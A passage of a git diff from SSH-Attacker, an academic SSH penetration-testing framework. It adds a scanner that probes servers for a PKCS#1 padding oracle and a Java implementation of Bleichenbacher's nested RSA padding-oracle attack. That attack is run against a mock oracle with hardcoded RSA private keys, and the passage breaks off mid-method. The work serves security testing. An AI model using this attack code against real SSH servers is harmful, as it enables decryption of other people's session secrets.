bleichenbacherCommandConfig, + Config baseConfig, + ParallelExecutor executor) { + super(bleichenbacherCommandConfig, baseConfig); + sshConfig = getSshConfig(); + setKeyExchangeAlgorithm(); + fullResponseMap = new ArrayList<>(); + this.executor = executor; + } + + /** + * @return If the server is vulnerable to Bleichenbacher's attack or not + */ + @Override + public Boolean isVulnerable() { + CONSOLE.info( + "A server is considered vulnerable to this attack if it reuses it's host key and " + + "responds differently to the test vectors."); + CONSOLE.info( + "A server is considered secure if it does not reuse the host key or" + + " if it does not have Manger's oracle."); + + RSAPublicKey publicKey = getServerPublicKey(); + if (publicKey == null) { + LOGGER.fatal("Could not retrieve PublicKey from Server - is the Server running?"); + throw new OracleUnstableException("Fatal Extraction error"); + } + + boolean reusesTransientPublicKey; + if (!isTransientKeyReused(publicKey)) { + CONSOLE.info("Server does not reuse the transient public key, it should be safe."); + reusesTransientPublicKey = false; + } else { + CONSOLE.info("Server reuses transient public key."); + reusesTransientPublicKey = true; + } + + return hasOracle() & reusesTransientPublicKey; + } + + /** + * Checks if the server has Bleichenbacher's oracle without checking if it reuses the transient + * public key + * + * @return If the server has Bleichenbacher's oracle or not + */ + public boolean hasOracle() { + CONSOLE.info( + "A server has Manger's Oracle if it responds differently to the test vectors."); + + RSAPublicKey publicKey = getServerPublicKey(); + if (publicKey == null) { + LOGGER.fatal("Could not retrieve PublicKey from Server - is the Server running?"); + throw new OracleUnstableException("Fatal Extraction error"); + } + + EqualityError referenceError; + fullResponseMap = new LinkedList<>(); + for (int i = 0; i < config.getNumberOfIterations(); i++) { + List responseMap = createVectorResponseList(publicKey, true); + this.fullResponseMap.addAll(responseMap); + } + + referenceError = getEqualityError(fullResponseMap); + if (referenceError != EqualityError.NONE) { + CONSOLE.info( + "Found a behavior difference within the responses. The server has Manger's oracle."); + } else { + CONSOLE.info( + "Found no behavior difference within the responses. The server is very likely to not have Manger's oracle."); + } + + CONSOLE.info(EqualityErrorTranslator.translation(referenceError)); + if (referenceError != EqualityError.NONE + || LOGGER.getLevel().isMoreSpecificThan(Level.INFO)) { + LOGGER.debug("-------------(Not Grouped)-----------------"); + for (VectorResponse vectorResponse : fullResponseMap) { + LOGGER.debug(vectorResponse.toString()); + } + } + + resultError = referenceError; + return referenceError != EqualityError.NONE; + } + + /** + * @return Response vector list + */ + private List createVectorResponseList(RSAPublicKey publicKey, boolean plain) { + List taskList = new LinkedList<>(); + List> stateVectorPairList = new LinkedList<>(); + + List vectors; + if (plain) { + vectors = + Pkcs1VectorGenerator.generatePlainPkcs1Vectors( + publicKey.getModulus().bitLength(), getHashLength(), getHashInstance()); + } else { + vectors = + Pkcs1VectorGenerator.generatePkcs1Vectors( + publicKey, getHashLength(), getHashInstance()); + } + + for (Pkcs1Vector vector : vectors) { + + State state; + if (plain) { + state = + new State( + sshConfig, + MangerWorkflowGenerator.generateDynamicWorkflow( + sshConfig, vector.getPlainValue())); + } else { + state = + new State( + sshConfig, + MangerWorkflowGenerator.generateWorkflow( + sshConfig, vector.getEncryptedValue())); + } + + FingerPrintTask fingerPrintTask = + new FingerPrintTask( + state, + additionalTimeout, + increasingTimeout, + executor.getReexecutions(), + additionalTcpTimeout); + + taskList.add(fingerPrintTask); + stateVectorPairList.add(new FingerprintTaskVectorPair<>(fingerPrintTask, vector)); + } + List tempResponseVectorList = new LinkedList<>(); + executor.bulkExecuteTasks(taskList); + for (FingerprintTaskVectorPair pair : stateVectorPairList) { + ResponseFingerprint fingerprint; + if (pair.getFingerPrintTask().isHasError()) { + erroneousScans = true; + LOGGER.warn("Could not extract fingerprint for " + pair); + } else { + fingerprint = pair.getFingerPrintTask().getFingerprint(); + tempResponseVectorList.add(new VectorResponse(pair.getVector(), fingerprint)); + } + } + return tempResponseVectorList; + } + + /** + * This assumes that the responseVectorList only contains comparable vectors + * + * @param responseVectorList Response vectors + * @return Type of EqualityError or EqualityError.NONE if there was none + */ + public EqualityError getEqualityError(List responseVectorList) { + + for (VectorResponse responseOne : responseVectorList) { + for (VectorResponse responseTwo : responseVectorList) { + if (responseOne == responseTwo) { + continue; + } + EqualityError error = + FingerPrintChecker.checkEquality( + responseOne.getFingerprint(), responseTwo.getFingerprint()); + if (error != EqualityError.NONE) { + CONSOLE.info("Found an EqualityError: " + error); + LOGGER.debug("Fingerprint1: " + responseOne.getFingerprint().toString()); + LOGGER.debug("Fingerprint2: " + responseTwo.getFingerprint().toString()); + return error; + } + } + } + return EqualityError.NONE; + } + + /** + * Fetches the transient public key from a key exchange. Note that multiple calls to this method + * when connected to the same server can yield different keys. + * + * @return Transient public key + */ + private RSAPublicKey getServerPublicKey() { + if (serverPublicKey == null) { + if (publicKeys.isEmpty()) { + getPublicKeys(); + serverPublicKey = publicKeys.get(0); + } else { + serverPublicKey = publicKeys.get(0); + } + } + return serverPublicKey; + } + + private RSAPublicKey getHostPublicKey() { + if (hostPublicKey == null) { + if (publicKeys.isEmpty()) { + getPublicKeys(); + hostPublicKey = publicKeys.get(1); + } else { + hostPublicKey = publicKeys.get(1); + } + } + return hostPublicKey; + } + + private void getPublicKeys() { + List fetchedRsaSsh1Keys = KeyFetcher.fetchRsaSsh1Keys(sshConfig); + if (fetchedRsaSsh1Keys.isEmpty()) { + LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?"); + return; + } + publicKeys.clear(); + publicKeys.addAll(fetchedRsaSsh1Keys); + } + + /** Checks if the server re-uses its RSA transient public key */ + public boolean isTransientKeyReused() { + RSAPublicKey transientKey1 = getServerPublicKey(); + RSAPublicKey transientKey2 = getServerPublicKey(); + if (transientKey1 == null || transientKey2 == null) { + LOGGER.fatal("Could not retrieve server transient public key, is the server running?"); + throw new OracleUnstableException("Fatal Extraction error"); + } else { + return comparePublicKeys(transientKey1, transientKey2); + } + } + + /** Checks if the server re-uses its RSA transient public key */ + private boolean isTransientKeyReused(RSAPublicKey transientKey1) { + RSAPublicKey transientKey2 = getServerPublicKey(); + if (transientKey1 == null || transientKey2 == null) { + LOGGER.fatal("Could not retrieve server transient public key, is the server running?"); + throw new OracleUnstableException("Fatal Extraction error"); + } else { + return comparePublicKeys(transientKey1, transientKey2); + } + } + + /** Compares moduli and public exponents of public keys to check if they are equal */ + private boolean comparePublicKeys(RSAPublicKey transientKey1, RSAPublicKey transientKey2) { + return transientKey1.getPublicExponent().equals(transientKey2.getPublicExponent()) + && transientKey1.getModulus().equals(transientKey2.getModulus()); + } + + @Override + public void executeAttack() { + + /*if (!isVulnerable()) { + LOGGER.warn("The server is not vulnerable to Manger's attack"); + return; + } + RSAPublicKey publicKey = getServerPublicKey(); + if (publicKey == null) { + LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?"); + return; + } + + if (config.getEncryptedSecret() == null) { + throw new ConfigurationException("The encrypted secret must be set to be decrypted."); + } + + if (config.getKexAlgorithm() == null) { + throw new ConfigurationException("The key exchange algorithm must be set."); + } + + LOGGER.info( + String.format( + "Fetched server public key with exponent %s and modulus: %s", + publicKey.getPublicExponent().toString(16), + publicKey.getModulus().toString(16))); + byte[] encryptedSecret = ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); + if ((encryptedSecret.length * Byte.SIZE) != publicKey.getModulus().bitLength()) { + throw new ConfigurationException( + "The length of the encrypted secret " + + "is not equal to the public key length. Have you selected the correct value?"); + }*/ + + byte[] encryptedSecret = ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); + + CustomRsaPrivateKey hostPrivatKey = + new CustomRsaPrivateKey( + new BigInteger( + "7AAB5898AEE7C451A2A90B9DE04EC947656FAB69460FF68E1E278EA1841D" + + "A22B39CA4A4FA7CEA1B8EDCB7224C38A1659D1226D2E07AF9A7C62A305AC" + + "9DEC042FBC290443B23E24C64765DE1AD58777A522BF102B1BCC5536D794" + + "62BCBE6DB8E91CD9CF6F98F62E5031BFAA9E51C93ED900579A39C26CBB64" + + "CF7E6F998513E20B4B2A4DD36D4F6F074A0FDB04232FA6EDAB89A1B32BA5" + + "2214696BDA66C4518A73F92807DD088AB11263519885A0CD6A42B6D9EAE9" + + "EBD13241EDC4EB7205AE838A5EF7AE280D36410057B38ED05CEBA75F92AC" + + "DF40226164BB3A0C4312B65A8C2FBA85CDB7CC5F77F53C45F64409AFC460" + + "210C8EE4DAB818F009172387ED00E141", + 16), + new BigInteger( + "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" + + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" + + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" + + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" + + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" + + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" + + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" + + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" + + "3F3EE64B04888B898864B08200A9E22909", + 16)); + + CustomRsaPublicKey hostPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" + + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" + + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" + + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" + + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" + + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" + + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" + + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" + + "3F3EE64B04888B898864B08200A9E22909", + 16)); + + CustomRsaPrivateKey serverPrivateKey = + new CustomRsaPrivateKey( + new BigInteger( + "64F3D28624C63EC5E0A9751FDC4B2D" + + "ADC715F0DDA9D49EF91B4C5AA03483" + + "570BA8AA01151B704335A3219E7D22" + + "2FDB9777DA68F8DF8B5CDB5DB9B0C3" + + "99CF0334044E6ED09B40E754809429" + + "F6C387B7AC7BA00ECFE7AFE4D41499" + + "B2F341FBB0496C52CBE5EB1F7E64F4" + + "BF21F72B64EE0B478EAB6A0008E07A" + + "E2F52960703D0EB9", + 16), + new BigInteger( + "00C25E6978A2B8FE2C6228024BD5D0" + + "F3239DDDDECCDF156AEF9D3F7F56AF" + + "8443C510A03C66779363C33082D04D" + + "23648B308AE0BE07A1451C8BFF0B97" + + "DCA43E5703D66B8C04BF46DDBC79A7" + + "7228179E5B246433098BF8271CCE66" + + "C5E4CB3A9E2ECEE52BB07C33F92893" + + "A5D5B6F163BE6FBC1E8E66E4666866" + + "871890105EFFE1193F", + 16)); + + CustomRsaPublicKey serverPublicKey = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00C25E6978A2B8FE2C6228024BD5D0" + + "F3239DDDDECCDF156AEF9D3F7F56AF" + + "8443C510A03C66779363C33082D04D" + + "23648B308AE0BE07A1451C8BFF0B97" + + "DCA43E5703D66B8C04BF46DDBC79A7" + + "7228179E5B246433098BF8271CCE66" + + "C5E4CB3A9E2ECEE52BB07C33F92893" + + "A5D5B6F163BE6FBC1E8E66E4666866" + + "871890105EFFE1193F", + 16)); + + try { + Ssh1MockOracle oracle = + new Ssh1MockOracle( + hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey); + Bleichenbacher attacker = + new Bleichenbacher(encryptedSecret, oracle, hostPublicKey, serverPublicKey); + attacker.attack(); + BigInteger solution = attacker.getSolution(); + /* BigInteger secret = + OaepConverter.decodeSolution( + solution, + getHashInstance(), + ((RSAPublicKey) oracle.getPublicKey()).getModulus().bitLength() + / Byte.SIZE);*/ + + CONSOLE.info("Encoded Solution: " + solution); + // CONSOLE.info("Decoded Secret: " + secret); + } catch (NoSuchPaddingException e) { + throw new RuntimeException(e); + } catch (NoSuchAlgorithmException e) { + throw new RuntimeException(e); + } catch (InvalidKeyException e) { + throw new RuntimeException(e); + } + + /* RealDirectMessagePkcs1Oracle oracle = + new RealDirectMessagePkcs1Oracle( + publicKey, getSshConfig(), extractValidFingerprint(publicKey), null); + Bleichenbacher attacker = new Bleichenbacher(encryptedSecret, oracle); + attacker.attack(); + BigInteger solution = attacker.getSolution(); + BigInteger secret = + OaepConverter.decodeSolution( + solution, + getHashInstance(), + ((RSAPublicKey) oracle.getPublicKey()).getModulus().bitLength() + / Byte.SIZE);*/ + + /*CONSOLE.info("Encoded Solution: " + solution); + CONSOLE.info("Decoded Secret: " + secret);*/ + } + + private ResponseFingerprint extractValidFingerprint(RSAPublicKey publicKey) { + Pkcs1Vector vector = + Pkcs1VectorGenerator.generateCorrectFirstBytePkcs1Vector( + publicKey, getHashLength(), getHashInstance()); + State state = + new State( + sshConfig, + MangerWorkflowGenerator.generateWorkflow( + sshConfig, vector.getEncryptedValue())); + FingerPrintTask fingerPrintTask = + new FingerPrintTask( + state, + additionalTimeout, + increasingTimeout, + executor.getReexecutions(), + additionalTcpTimeout); + FingerprintTaskVectorPair stateVectorPair = + new FingerprintTaskVectorPair<>(fingerPrintTask, vector); + + executor.bulkExecuteTasks(fingerPrintTask); + ResponseFingerprint fingerprint = null; + if (stateVectorPair.getFingerPrintTask().isHasError()) { + LOGGER.warn("Could not extract fingerprint for " + stateVectorPair); + } else { + fingerprint = fingerPrintTask.getFingerprint(); + } + return fingerprint; + } + + private int getHashLength() { + switch (keyExchangeAlgorithm) { + case RSA2048_SHA256: + return 256; + case RSA1024_SHA1: + return 160; + default: + return 0; + } + } + + private String getHashInstance() { + switch (keyExchangeAlgorithm) { + case RSA2048_SHA256: + return "SHA-256"; + case RSA1024_SHA1: + return "SHA-1"; + default: + return ""; + } + } + + private void setKeyExchangeAlgorithm() { + if (config.getKexAlgorithm() == null) { + throw new ConfigurationException("The key exchange algorithm must be set."); + } else { + if (config.getKexAlgorithm().equals("rsa2048-sha256")) { + keyExchangeAlgorithm = KeyExchangeAlgorithm.RSA2048_SHA256; + + } else if (config.getKexAlgorithm().equals("rsa1024-sha1")) { + keyExchangeAlgorithm = KeyExchangeAlgorithm.RSA1024_SHA1; + } else { + throw new ConfigurationException( + "Unknown key exchange algorithm, did you mistype it? " + + "Options are rsa2048-sha256 and rsa1024-sha1"); + } + } + + // Set only supported key exchange algorithm to the one specified by the user + sshConfig.setClientSupportedKeyExchangeAlgorithms( + new ArrayList<>(Collections.singleton(keyExchangeAlgorithm))); + + CONSOLE.info("Set key exchange algorithm to: " + keyExchangeAlgorithm); + } + + public EqualityError getResultError() { + return resultError; + } + + public List getResponseMapList() { + return fullResponseMap; + } + + public boolean isErrornousScans() { + return erroneousScans; + } + + public boolean isIncreasingTimeout() { + return increasingTimeout; + } + + public void setIncreasingTimeout(boolean increasingTimeout) { + this.increasingTimeout = increasingTimeout; + } + + public long getAdditionalTimeout() { + return additionalTimeout; + } + + public void setAdditionalTimeout(long additionalTimeout) { + this.additionalTimeout = additionalTimeout; + } + + public long getAdditionalTcpTimeout() { + return additionalTcpTimeout; + } + + public void setAdditionalTcpTimeout(long additionalTcpTimeout) { + this.additionalTcpTimeout = additionalTcpTimeout; + } +} diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java new file mode 100644 index 000000000..6e5d1f0e4 --- /dev/null +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -0,0 +1,586 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.attacks.pkcs1; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Pkcs1Oracle; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import java.math.BigInteger; +import java.security.InvalidKeyException; +import java.security.NoSuchAlgorithmException; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.List; +import javax.crypto.BadPaddingException; +import javax.crypto.Cipher; +import javax.crypto.IllegalBlockSizeException; +import javax.crypto.NoSuchPaddingException; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class Bleichenbacher extends Pkcs1Attack { + + private static final Logger LOGGER = LogManager.getLogger(); + CustomRsaPublicKey hostPublicKey; + CustomRsaPublicKey serverPublicKey; + + private final BigInteger big_two = BigInteger.valueOf(2); + + private BigInteger B = null; + private BigInteger two_B = null; + private BigInteger three_B = null; + private BigInteger three_B_sub_one = null; + private BigInteger three_B_plus_one = null; + + /** + * @param msg The message that should be decrypted with the attack + * @param pkcsOracle The oracle to be queried + */ + public Bleichenbacher( + byte[] msg, + Pkcs1Oracle pkcsOracle, + CustomRsaPublicKey hostPublicKey, + CustomRsaPublicKey serverPublicKey) { + super(msg, pkcsOracle); + this.hostPublicKey = hostPublicKey; + this.serverPublicKey = serverPublicKey; + } + + /** + * Divides a / b, returns the down-rounded result. + * + * @param a The BigInt which gets divided + * @param b The BigInt which is the divider + * @return Down-rounded division-result + */ + private BigInteger floor(BigInteger a, BigInteger b) { + return a.divide(b); + } + + /** + * Divides a / b, returns the up-rounded result. + * + * @param a The BigInt which gets divided + * @param b The BigInt which is the divider + * @return Up-rounded division-result + */ + private BigInteger ceil(BigInteger a, BigInteger b) { + BigInteger c = a.mod(b); + if (c.compareTo(BigInteger.ZERO) > 0) { + return a.divide(b).add(BigInteger.ONE); + } else { + return a.divide(b); + } + } + + /** + * Searches the smallest suitable s-value for the BB-Attack + * + * @param lowerBound The smallest value where it makes sens to start searching + * @param ciphertext the ciphertext which should be checked against + * @param rsaPublicKey the public-key to the ciphertext, which should be used to encrypt + * @return the smallest s-value, which generates a valid PKCS#1 Ciphertext + */ + private BigInteger find_smallest_s( + BigInteger lowerBound, byte[] ciphertext, CustomRsaPublicKey rsaPublicKey) { + BigInteger s = lowerBound; + LOGGER.debug("Searching for smallest s, beginning at: {}", lowerBound.toString(16)); + LOGGER.debug("Ciphertext: {} ", bytesToHex(ciphertext)); + + while (true) { + BigInteger exponentiated = + s.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); + BigInteger cipher = new BigInteger(1, ciphertext); + BigInteger res = cipher.multiply(exponentiated); + BigInteger attempt = res.mod(rsaPublicKey.getModulus()); + boolean oracleResult = queryOracle(attempt, false); + + if (oracleResult) { + return s; + } + s = s.add(BigInteger.ONE); + } + } + + /** + * Searches the smallest suitable s-value for the inner encryption of a nested (double + * encrypted) BB-Attack. + * + * @param lowerBound The smallest value where it makes sens to start searching + * @param ciphertext the ciphertext which should be checked against + * @param rsaPublicKey the public-key to the ciphertext, which should be used to encrypt + * @param outerKey the rsa-public-key for the outer encryption, encrypting the generated s-value + * @return the smallest s-value, which generates a valid PKCS#1 Ciphertext + */ + private BigInteger find_smallest_s_nested( + BigInteger lowerBound, + byte[] ciphertext, + CustomRsaPublicKey rsaPublicKey, + CustomRsaPublicKey outerKey) { + BigInteger s = lowerBound; + LOGGER.debug("Searching for smallest s, beginning at: {}", lowerBound.toString(16)); + LOGGER.debug("Ciphertext: {}", bytesToHex(ciphertext)); + + while (true) { + BigInteger exponentiated = + s.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); + BigInteger cipher = new BigInteger(1, ciphertext); + BigInteger res = cipher.multiply(exponentiated); + BigInteger attempt = res.mod(rsaPublicKey.getModulus()); + + BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); + + boolean oracleResult = queryOracle(encryptedAttempt, true); + + if (oracleResult) { + LOGGER.debug("Found smallest s: {}", s); + return s; + } + + s = s.add(BigInteger.ONE); + } + } + + /** + * Searches for a valid s-value in a given range of possible s-values for the inner encryption + * of a nested (double encrypted) BB-Attack + * + * @param lowerBound the lower bound for the possible s-values + * @param upperBound the upper boud for the possible s-values + * @param previousS the last s which was found, + * @param ciphertext the ciphertext, for which the s-values should be found + * @param rsaPublicKey the public-key for which the s-values should be found + * @param outerKey the outer encryption key + * @return + */ + private BigInteger find_s_in_range_nested( + BigInteger lowerBound, + BigInteger upperBound, + BigInteger previousS, + byte[] ciphertext, + CustomRsaPublicKey rsaPublicKey, + CustomRsaPublicKey outerKey) { + LOGGER.debug( + "Searching for s in range from {} to {}", + lowerBound.toString(16), + upperBound.toString(16)); + + BigInteger bTimesPrevs = upperBound.multiply(previousS); + BigInteger bTimePrevsSubTwoB = bTimesPrevs.subtract(two_B); + BigInteger ri = ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); + + while (true) { + BigInteger rITimesN = ri.multiply(rsaPublicKey.getModulus()); + BigInteger si_lower = ceil(two_B.add(rITimesN), upperBound); + BigInteger si_upper = ceil(three_B.add(rITimesN), lowerBound); + + for (BigInteger si = si_lower; + si.compareTo(si_upper) < 0; + si = si.add(BigInteger.ONE)) { + BigInteger exponentiated = + si.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); + BigInteger cipher = new BigInteger(1, ciphertext); + BigInteger res = cipher.multiply(exponentiated); + BigInteger attempt = res.mod(rsaPublicKey.getModulus()); + + BigInteger encryptedAttempt = encryptBigInt(attempt, outerKey); + + boolean oracleResult = queryOracle(encryptedAttempt, true); + + if (oracleResult) { + return si; + } + } + + ri = ri.add(BigInteger.ONE); + } + } + + /** + * Searches for a valid s-value in a given range of possible s-values of a BB-Attack + * + * @param lowerBound the lower bound for the possible s-values + * @param upperBound the upper boud for the possible s-values + * @param previousS the last s which was found, + * @param ciphertext the ciphertext, for which the s-values should be found + * @param rsaPublicKey the public-key for which the s-values should be found + * @return + */ + private BigInteger find_s_in_range( + BigInteger lowerBound, + BigInteger upperBound, + BigInteger previousS, + byte[] ciphertext, + CustomRsaPublicKey rsaPublicKey) { + LOGGER.debug( + "Searching for s in range from {} to {}", + lowerBound.toString(16), + upperBound.toString(16)); + + BigInteger bTimesPrevs = upperBound.multiply(previousS); + BigInteger bTimePrevsSubTwoB = bTimesPrevs.subtract(two_B); + BigInteger ri = ceil(big_two.multiply(bTimePrevsSubTwoB), rsaPublicKey.getModulus()); + + while (true) { + BigInteger rITimesN = ri.multiply(rsaPublicKey.getModulus()); + BigInteger si_lower = ceil(two_B.add(rITimesN), upperBound); + BigInteger si_upper = ceil(three_B.add(rITimesN), lowerBound); + + for (BigInteger si = si_lower; + si.compareTo(si_upper) < 0; + si = si.add(BigInteger.ONE)) { + BigInteger exponentiated = + si.modPow(rsaPublicKey.getPublicExponent(), rsaPublicKey.getModulus()); + BigInteger cipher = new BigInteger(1, ciphertext); + BigInteger res = cipher.multiply(exponentiated); + BigInteger attempt = res.mod(rsaPublicKey.getModulus()); + boolean oracleResult = queryOracle(attempt, false); + + if (oracleResult) { + return si; + } + } + ri = ri.add(BigInteger.ONE); + } + } + + /** + * Inserts a newly found interval into the known intervals M at the correct position + * + * @param M the known intervals of the previous attack-steps + * @param intervalToInsert the newly found interval, which should be inserted + * @return + */ + static List safeIntervalInsert(List M, Interval intervalToInsert) { + for (int i = 0; i < M.size(); i++) { + Interval chosenInterval = M.get(i); + + if (chosenInterval.upper.compareTo(intervalToInsert.lower) >= 0 + && chosenInterval.lower.compareTo(intervalToInsert.upper) <= 0) { + BigInteger lb = chosenInterval.lower.min(intervalToInsert.lower); + BigInteger ub = chosenInterval.upper.max(intervalToInsert.upper); + M.set(i, new Interval(lb, ub)); + LOGGER.debug( + "Overlap found, inserting lowerBound: {} upperboudn: {} into new M [{}] = {}", + lb.toString(16), + ub.toString(16), + i, + M.toString()); + return M; + } + } + + M.add(intervalToInsert); + return M; + } + + /** + * Searches for the next intervals given by the found s-value for the BB-Attack + * + * @param M the previoud found Intervals + * @param s the found s-value which generates a valid PCKS-Padding + * @param rsaPublicKey the public key, for which the ciphertext should be decrypted + * @return + */ + private List updateInterval( + List M, BigInteger s, CustomRsaPublicKey rsaPublicKey) { + List M_new = new ArrayList<>(); + for (Interval chosenInterval : M) { + /* + a * s - 3 * B + 1 + */ + BigInteger lowerTimesS = chosenInterval.lower.multiply(s); + BigInteger lowerPartForCeil = lowerTimesS.subtract(three_B_plus_one); + + BigInteger r_lower = ceil(lowerPartForCeil, rsaPublicKey.getModulus()); + + LOGGER.debug( + "found r_lower: {} from lowerPartForCeil: {}", + r_lower.toString(16), + lowerPartForCeil.toString(16)); + + /* + b * s - 2 * B + */ + BigInteger upperTimesS = chosenInterval.upper.multiply(s); + BigInteger upperPartForCeil = upperTimesS.subtract(two_B); + BigInteger r_upper = ceil(upperPartForCeil, rsaPublicKey.getModulus()); + LOGGER.debug( + "found r_upper: {} from upperPartForCeil: {}", + r_upper.toString(16), + upperPartForCeil.toString(16)); + + for (BigInteger r = r_lower; r.compareTo(r_upper) < 0; r = r.add(BigInteger.ONE)) { + BigInteger lowerBound = chosenInterval.lower; + BigInteger upperBound = chosenInterval.upper; + + BigInteger lowerUpperBound = + ceil(two_B.add(r.multiply(rsaPublicKey.getModulus())), s); + lowerBound = lowerBound.max(lowerUpperBound); + LOGGER.debug("found lowerBound: {}", lowerBound.toString(16)); + + BigInteger upperUpperBound = + floor(three_B_sub_one.add(r.multiply(rsaPublicKey.getModulus())), s); + upperBound = upperBound.min(upperUpperBound); + LOGGER.debug("found upperBound: {}", upperBound.toString(16)); + + Interval interim_interval = new Interval(lowerBound, upperBound); + LOGGER.debug( + "new Interval to insert lower: {} upper: {}", + interim_interval.lower.toString(16), + interim_interval.upper.toString(16)); + + M_new = safeIntervalInsert(M_new, interim_interval); + LOGGER.debug( + "safeinserting in M_new lower: {} M upper: {}", + M_new.get(0).lower.toString(16), + M_new.get(0).upper.toString(16)); + } + } + + return M_new; + } + + /** The function to start the Attack */ + public void attack() { + + if (hostPublicKey.getModulus().bitLength() > serverPublicKey.getModulus().bitLength()) { + byte[] cracked = + nestedBleichenbacher(encryptedMsg, this.serverPublicKey, this.hostPublicKey); + LOGGER.debug("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); + byte[] cracked_decoded = pkcs1Decode(cracked); + LOGGER.debug("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); + + solution = new BigInteger(cracked_decoded); + } else { + byte[] cracked = + nestedBleichenbacher(encryptedMsg, this.serverPublicKey, this.hostPublicKey); + LOGGER.debug("Cracked encoded: {}", ArrayConverter.bytesToHexString(cracked)); + byte[] cracked_decoded = pkcs1Decode(cracked); + LOGGER.debug("Cracked decoded: {}", ArrayConverter.bytesToHexString(cracked_decoded)); + solution = new BigInteger(cracked_decoded); + } + } + + /** + * The Bleichenbacher-Attack for a nested encryption. The Encryption is: (outerkey ( innerkey ( + * ciphertext))) + * + * @param ciphertext The Ciphertext, which should be decrypted + * @param innerPublicKey The known public key, for the inner encryption for the ciphertext + * @param outerPublicKey The known public key, for the outer encryption for the ciphertext + * @return + */ + private byte[] nestedBleichenbacher( + byte[] ciphertext, + CustomRsaPublicKey innerPublicKey, + CustomRsaPublicKey outerPublicKey) { + int innerBitsize = innerPublicKey.getModulus().bitLength(); + int outerBitsize = outerPublicKey.getModulus().bitLength(); + int innerK = innerBitsize / 8; + int outerK = outerBitsize / 8; + + B = big_two.pow(8 * (outerK - 2)); + two_B = B.multiply(big_two); + three_B = B.multiply(BigInteger.valueOf(3)); + three_B_sub_one = three_B.subtract(BigInteger.ONE); + three_B_plus_one = three_B.add(BigInteger.ONE); + + LOGGER.debug("Starting with outer BB {} ", ArrayConverter.bytesToHexString(ciphertext)); + byte[] encoded_inner_ciphertext = bleichenbacher(ciphertext, outerPublicKey); + LOGGER.debug("got inner BB {}", ArrayConverter.bytesToHexString(ciphertext)); + byte[] innerCiphertext = pkcs1Decode(encoded_inner_ciphertext); + LOGGER.debug("Decoded inner BB into {}", ArrayConverter.bytesToHexString(innerCiphertext)); + + LOGGER.debug("Switching to inner Ciphertext, cracked outer successful"); + + B = big_two.pow(8 * (innerK - 2)); + two_B = B.multiply(big_two); + three_B = B.multiply(BigInteger.valueOf(3)); + three_B_sub_one = three_B.subtract(BigInteger.ONE); + three_B_plus_one = three_B.add(BigInteger.ONE); + + LOGGER.debug("inner bitsize: {}", innerBitsize); + LOGGER.debug("inner k: {}", innerK); + LOGGER.debug("B: {}", B.toString(16)); + LOGGER.debug("2B: {}", two_B.toString(16)); + LOGGER.debug("3B: {}", three_B.toString(16)); + LOGGER.debug("3B - 1 : {}", three_B_sub_one.toString(16)); + LOGGER.debug("Ciphertext: {}", ArrayConverter.bytesToHexString(innerCiphertext)); + + // new ciphertext is cracked inner ciphertext + ciphertext = innerCiphertext; + + List M = new ArrayList<>(); + M.add(new Interval(two_B, three_B_sub_one)); + LOGGER.debug( + "M lower: {} M upper: {}", + M.get(0).lower.toString(16), + M.get(0).upper.toString(16)); + + BigInteger s = + find_smallest_s_nested( + ceil(innerPublicKey.getModulus(), three_B), + ciphertext, + innerPublicKey, + outerPublicKey); + + LOGGER.debug( + "found s, initial updating M lower: {} M upper: {}", + M.get(0).lower.toString(16), + M.get(0).upper.toString(16)); + + M = updateInterval(M, s, innerPublicKey); + LOGGER.debug("Length: {} M: {}", M.size(), M.toString()); + + while (true) { + if (M.size() >= 2) { + s = + find_smallest_s_nested( + 